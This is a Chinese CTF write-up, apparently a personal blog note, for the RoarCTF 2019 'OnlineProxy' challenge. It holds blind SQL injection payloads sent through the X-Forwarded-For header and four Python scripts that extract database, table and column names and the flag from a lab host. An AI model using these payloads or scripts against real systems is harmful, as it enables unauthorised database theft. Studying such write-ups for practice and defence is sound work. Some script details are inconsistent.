[RoarCTF2019]OnlineProxy - 刷题笔记 | zty153’s

# [RoarCTF2019]OnlineProxy

这里发现通过修改 X-FORWARDED-FOR 的值注释部分的内容也随之改变

尝试盲注，上传命令时第一次为 Current Ip 发现并不能执行，再次上传 Current Ip 时上次的 Current Ip 变为 Last Ip 也没有执行，再次 send 即可正常执行命令

简单尝试使用盲注得到所有库名，这里可以看到该方法是没问题的

爆破库名：

0' or ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1 or '0

	import requests

	url = "http://node4.buuoj.cn:26869/"
	head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
	}
	result = ""
	for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
	head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
	html_0 = requests.post(url,headers = head)
	head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid+1)
	html_0 = requests.post(url, headers=head)
	html_0 = requests.post(url, headers=head)
	if "Last Ip: 1" in html_0.text:
	l= mid+1
	else:
	r=mid
	mid = (l+r)>>1
	if(chr(mid)==' '):
	break
	result+=chr(mid)
	print(result)
	print("table_name:"+result)

爆破表名：

0' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='F4l9_D4t4B45e')),1,1))>1 or '0

	import requests

	url = "http://node4.buuoj.cn:26869/"
	head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
	}
	result = ""
	urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
	for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
	head["X-Forwarded-For"] = urls.format(i,mid)
	html_0 = requests.post(url,headers = head)
	head["X-Forwarded-For"] = urls.format(i, mid+1)
	html_0 = requests.post(url, headers=head)
	html_0 = requests.post(url, headers=head)
	if "Last Ip: 1" in html_0.text:
	l= mid+1
	else:
	r=mid
	mid = (l+r)>>1
	if(chr(mid)==' '):
	break
	result+=chr(mid)
	print(result)
	print("table_name:"+result)

查列名：

0' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F4l9_t4b1e')),1,1))>1 or '0

	import requests

	url = "http://node4.buuoj.cn:26869/"
	head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
	}
	result = ""
	urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
	for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
	head["X-Forwarded-For"] = urls.format(i,mid)
	html_0 = requests.post(url,headers = head)
	head["X-Forwarded-For"] = urls.format(i, mid+1)
	html_0 = requests.post(url, headers=head)
	html_0 = requests.post(url, headers=head)
	if "Last Ip: 1" in html_0.text:
	l= mid+1
	else:
	r=mid
	mid = (l+r)>>1
	if(chr(mid)==' '):
	break
	result+=chr(mid)
	print(result)
	print("table_name:"+result)

查 Flag

0' or ascii(substr((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),1,1))>1 or '0

	import requests

	url = "http://node4.buuoj.cn:26869/"
	head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=6d033f15-65eb-4a27-a711-76514d4487d5",
	"X-Forwarded-For" : ""
	}
	result = ""
	urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
	for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
	head["X-Forwarded-For"] = urls.format(i,mid)
	html_0 = requests.post(url,headers = head)
	head["X-Forwarded-For"] = urls.format(i, mid+1)
	html_0 = requests.post(url, headers=head)
	html_0 = requests.post(url, headers=head)
	if "Last Ip: 1" in html_0.text:
	l= mid+1
	else:
	r=mid
	mid = (l+r)>>1
	if(chr(mid)==' '):
	break
	result+=chr(mid)
	print(result)
	print("table_name:"+result)

参考链接：[BUUCTF--RoarCTF 2019] Online Proxy_onlineproxy ctf-CSDN 博客

buuctf sql注入